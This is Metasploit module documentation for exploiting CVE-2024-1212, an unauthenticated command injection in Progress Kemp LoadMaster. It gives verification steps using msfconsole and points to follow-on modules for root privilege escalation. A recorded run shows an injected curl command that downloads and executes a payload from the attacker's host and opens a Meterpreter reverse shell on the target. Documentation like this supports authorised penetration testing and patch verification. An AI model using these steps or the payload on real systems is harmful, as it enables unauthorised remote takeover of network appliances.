## Vulnerable Application
CVE-2024-1212: Progress Kemp LoadMaster Unauthenticated Command Injection

For more details on the vulnerability:  
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/

https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212

A trial VM which the exploit should work against out of the box can be downloaded from:
https://sso.kemptechnologies.com/register/kemp/vlm

The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw

## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
1. Do: `set RHOSTS <target loadmaster>`
1. Do: `set RPORT <port loadmaster is running on>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `bal` user.
1. (Optional) use the module `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` to gain root privileges.
1. (Optional) use the script `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc` to automatically run the above module.

## Scenarios

### LoadMaster 7.2.59.0.22007

``` msf
msf exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > show options

Module options (exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.141     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to LoadMaster
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      GyzwtIbxq        no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp/            yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > run

[*] Command to run on remote host: curl -so /tmp/LlipoMVy http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/LlipoMVy; /tmp/LlipoMVy &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.5.134.141:443 is vulnerable...
[+] The target is vulnerable.
[*] Sending payload...
[*] Client 10.5.134.141 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.134.141 (curl/7.77.0)
[+] Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.141:29264) at 2024-04-12 17:08:57 -0500

meterpreter > sysinfo
Computer     : 10.5.134.141
OS           : SuSE 7.2 (Linux 4.14.137)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: bal
```
